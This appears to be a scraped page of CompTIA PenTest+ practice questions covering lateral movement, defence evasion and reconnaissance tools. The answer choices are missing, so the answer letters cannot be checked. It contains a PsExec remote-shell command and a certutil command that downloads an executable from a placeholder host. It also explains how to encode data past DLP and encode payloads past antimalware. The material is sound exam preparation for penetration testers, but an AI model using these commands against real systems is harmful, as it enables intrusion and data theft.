CompTIA PT0-003 CompTIA PenTest+ Exam Practice Test

Page: 1 / 14
Total 181 questions
Question 1

While performing a penetration testing exercise, a tester executes the following command:

bash

Copy code

PS c:\tools> c:\hacks\PsExec.exe \\server01.comptia.org -accepteula cmd.exe

Which of the following best explains what the tester is trying to do?



Answer : B

Lateral Movement with PsExec:

PsExec is a tool used for executing processes on remote systems.

The command enables the tester to execute cmd.exe on the target host (server01) to achieve lateral movement and potentially escalate privileges.

Why Not Other Options?

A: The command is not testing connectivity; it is executing a remote command.

C: PsExec does not send its binary; it executes commands on remote systems.

D: The command is not enabling cmd.exe; it is using it as a tool for executing commands remotely.

CompTIA Pentest+ Reference:

Domain 3.0 (Attacks and Exploits)


Question 2

Which of the following techniques is the best way to avoid detection by data loss prevention tools?



Answer : A

Encoding to Evade DLP:

Encoding (e.g., Base64) transforms data into a format that may bypass data loss prevention (DLP) tools.

DLP solutions often look for specific patterns (e.g., sensitive keywords, file headers) and may not recognize encoded data.

Why Not Other Options?

B (Compression): Compression reduces file size but does not typically bypass DLP detection mechanisms.

C (Encryption): Encrypted data is detectable by DLP tools, though its contents may not be readable.

D (Obfuscation): While obfuscation hides intent, encoding is more effective for bypassing automated detection.

CompTIA Pentest+ Reference:

Domain 3.0 (Attacks and Exploits)


Question 3

A penetration tester needs to use the native binaries on a system in order to download a file from the internet and evade detection. Which of the following tools would the tester most likely use?



Answer : B

Certutil.exe for File Downloads:

certutil.exe is a native Windows utility primarily used for managing certificates but can also be leveraged to download files from the internet.

Example command:

bash

Copy code

certutil.exe -urlcache -split -f http://example.com/file.exe file.exe

Its native status helps it evade detection by security tools.

Why Not Other Options?

A (netsh.exe): Used for network configuration but not for downloading files.

C (nc.exe): Netcat is not native to Windows and would need to be introduced to the system.

D (cmdkey.exe): Used for managing stored credentials, not downloading files.

CompTIA Pentest+ Reference:

Domain 3.0 (Attacks and Exploits)


Question 4

During a pre-engagement activity with a new customer, a penetration tester looks for assets to test. Which of the following is an example of a target that can be used for testing?



Answer : A

API as a Target:

APIs (Application Programming Interfaces) are common assets to test for vulnerabilities such as improper authentication, data leakage, or injection attacks.

Testing APIs often uncovers critical issues in modern applications.

Why Not Other Options?

B (HTTP): This is a protocol, not a specific asset.

C (IPA): Unrelated to penetration testing (likely a typo or irrelevant here).

D (ICMP): This is a protocol used for network diagnostics, not an application asset.

CompTIA Pentest+ Reference:

Domain 1.0 (Planning and Scoping)


Question 5

A penetration tester is ready to add shellcode for a specific remote executable exploit. The tester is trying to prevent the payload from being blocked by antimalware that is running on the target. Which of the following commands should the tester use to obtain shell access?



Answer : A

Using shikata_ga_nai:

This encoder obfuscates the payload, making it harder for antimalware to detect.

The command specifies a bind shell (windows/bind_tcp) payload, targeting Windows with architecture x86-64.

Why Not Other Options?

B, C: These commands generate payloads but do not use an encoder, increasing the likelihood of detection by antimalware.

D: This command is unrelated to generating shellcode; it appears to be an attempt to manipulate accounts.

CompTIA Pentest+ Reference:

Domain 3.0 (Attacks and Exploits)


Question 6

Which of the following explains the reason a tester would opt to use DREAD over PTES during the planning phase of a penetration test?



Answer : D

DREAD for Threat Modeling:

DREAD is a risk assessment framework used in threat modeling to prioritize vulnerabilities based on their impact, reproducibility, exploitability, affected users, and discoverability.

It is specifically designed for creating and analyzing threat models.

Why Not Other Options?

A, B, C: While DREAD can be applied in various contexts (web, mobile, thick client applications), its primary purpose is threat modeling, not specific testing methodologies like PTES.

CompTIA Pentest+ Reference:

Domain 1.0 (Planning and Scoping)


Question 7

During host discovery, a security analyst wants to obtain GeoIP information and a comprehensive summary of exposed services. Which of the following tools is best for this task?



Answer : D

Censys.io:

Censys.io is a search engine for Internet-connected devices. It provides information about IP addresses, domains, GeoIP data, and exposed services.

Why Not Other Options?

A (WiGLE.net): Focuses on mapping Wi-Fi networks, not providing detailed information about IP addresses or services.

B (WHOIS): Provides domain registration and ownership details but lacks GeoIP and service summaries.

C (theHarvester): Primarily gathers OSINT like email addresses, subdomains, and names but not service information or GeoIP data.

CompTIA Pentest+ Reference:

Domain 2.0 (Information Gathering and Vulnerability Identification)


Page:    1 / 14   
Total 181 questions